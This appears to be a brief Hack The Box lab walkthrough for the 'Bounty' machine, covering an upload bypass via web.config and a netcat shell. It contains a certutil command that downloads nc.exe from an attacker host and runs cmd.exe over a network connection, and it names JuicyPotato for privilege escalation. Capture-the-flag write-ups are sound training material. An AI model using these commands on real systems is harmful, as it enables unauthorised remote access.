HTB - Bounty web.config bind shell
Walkthrough
First I do a nmap scan on Bounty. Port 80 is open.
We notice transfer.aspx and UploadedFiles exist. We cannot upload .asp or .aspx extensions. Lets try web.config and use this bind shell.
The web.config will be deleted within 1-4 minutes after you upload. Quicky use netcat to get a shell on the box.
certutil -f -urlcache http://10.10.14.2/nc.exe C:\temp\nc.exe C:\temp\nc.exe 10.10.14.2 53 -e C:\Windows\System32\cmd.exe
The usual 4444 will not work. Use ports 53 or 443 instead.
Use JuicyPotato.exe for privilege escalation.
Comments
Post a Comment